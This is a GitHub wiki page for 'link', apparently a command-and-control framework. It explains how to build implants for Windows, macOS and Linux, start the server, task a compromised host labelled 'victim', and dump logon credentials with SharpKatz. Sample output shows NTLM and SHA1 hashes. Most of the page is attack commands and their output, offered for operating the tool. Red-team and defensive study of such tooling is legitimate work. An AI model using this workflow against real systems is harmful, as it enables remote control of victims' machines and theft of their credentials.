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Installation and Usage

postrequest edited this page Apr 12, 2021 · 5 revisions


Kali Linux

Made simple with the install script, link can be built with the following commands:

$ git clone
$ cd link/
$ ./


  • All links take a long time to generate on the first time, but will be much quicker on subsequent generation.
  • Building MacOS links relies on the osxcross toolchain. When generating the first MacOS link, link will clone and build osxcross locally. This takes a lot of time, but is only required once.


If you require link to work offline, ensure that you have generated links for all targets and installed SharpCollection (if required). This can be done by generating links and running sharp init like so:

πŸ”— > generate
please wait...                                                                                                                                             
link successfully built
output: link.exe
output: link.dll
output: link.bin
πŸ”— > generate-osx
please wait...
link successfully built
output: link
πŸ”— > generate-linux
please wait...
link successfully built
output: link
πŸ”— > sharp init
download SharpCollection
πŸ”— > 


Starting link

$ ./target/release/link

                                    .-') _       .-. .-')
                                   ( OO ) )      \  ( OO )
 ,--.             ,-.-')       ,--./ ,--,'       ,--. ,--.
 |  |.-')         |  |OO)      |   \ |  |\       |  .'   /
 |  | OO )        |  |  \      |    \|  | )      |      /,
 |  |`-' |        |  |(_/      |  .     |/       |     ' _)
(|  '---.'       ,|  |_.'      |  |\    |        |  .   \
 |      |       (_|  |         |  | \   |        |  |\   \
 `------'         `--'         `--'  `--'        `--' '--'
Start web server (Y/n)?
Please provide bind address (eg:
πŸ”— > 

Generating a link

πŸ”— > generate
first link build will take time
please wait...
link successfully built
output: link.exe
πŸ”— >

Interacting with a link

πŸ”— >

πŸ”— New link: 9981394a48b54969848ba69cc9d20896 (DESKTOP-6FR6M8L\[email protected]) πŸ”—

πŸ”— > links

[1 Link]

 id                               | type  | platform | who                          | internal ip   | last checkin                         | status
 9981394a48b54969848ba69cc9d20896 | Ring3 | windows  | DESKTOP-6FR6M8L\victim       |     | 2021-02-14 16:21:11.205812832 +11:00 | Active

πŸ”— > links -i 9981394a48b54969848ba69cc9d20896
(9981394a48b54969848ba69cc9d20896) πŸ”— > whoami
(9981394a48b54969848ba69cc9d20896) πŸ”— >

Link: 9981394a48b54969848ba69cc9d20896 (DESKTOP-6FR6M8L\[email protected])
Task ID: 4be39516-b785-4009-b397-fdf7179b1d20
Command: whoami


(9981394a48b54969848ba69cc9d20896) πŸ”— > 

Executing SharpCollection tools

(9981394a48b54969848ba69cc9d20896) πŸ”— > sharp SharpKatz --Command logonpasswords                                                                                                                         [117/815]
could not find tool, at the main menu the following command may help:
sharp init
(9981394a48b54969848ba69cc9d20896) πŸ”— > back
πŸ”— > sharp init
downloading SharpCollection
πŸ”— > links -i 9981394a48b54969848ba69cc9d20896
(9981394a48b54969848ba69cc9d20896) πŸ”— > sharp SharpKatz --Command logonpasswords
(9981394a48b54969848ba69cc9d20896) πŸ”— >

Link: 9981394a48b54969848ba69cc9d20896 (DESKTOP-6FR6M8L\[email protected])
Task ID: e397ba44-5c9f-4734-b3a4-d2b5970a59c6
Command: sharp SharpKatz --Command logonpasswords

[*]                     System Information
[*] ----------------------------------------------------------------------
[*] | Platform: Win32NT                                                  |
[*] ----------------------------------------------------------------------
[*] | Major: 10            | Minor: 0             | Build: 19041         |
[*] ----------------------------------------------------------------------
[*] | Version: Microsoft Windows NT 10.0.19041.0                         |
[*] ----------------------------------------------------------------------
[*] Authentication Id   : 0;283239 (00000000:00283239)
[*] Session             : Interactive from 1
[*] UserName            : victim
[*] LogonDomain         : DESKTOP-6FR6M8L
[*] LogonServer         : DESKTOP-6FR6M8L
[*] LogonTime           : 2021/02/14 16:17:51
[*] SID                 : S-1-5-21-178190763-3086215798-2254057950-1001
[*]      Msv
[*]       Domain   : DESKTOP-6FR6M8L
[*]       Username : victim
[*]       LM       : 00000000000000000000000000000000
[*]       NTLM     : 8846f7eaee8fb117ad06bdd830b7586c
[*]       SHA1     : e8f97fba9104d1ea5047948e6dfb67facd9f5b73
[*]       DPAPI    : 00000000000000000000000000000000
[*]      WDigest
[*]       Hostname : DESKTOP-6FR6M8L
[*]       Username : victim
[*]       Password : [NULL]
[*]      Kerberos
[*]       Domain   : DESKTOP-6FR6M8L
[*]       Username : victim
[*]       Password : [NULL]
... output snipped ...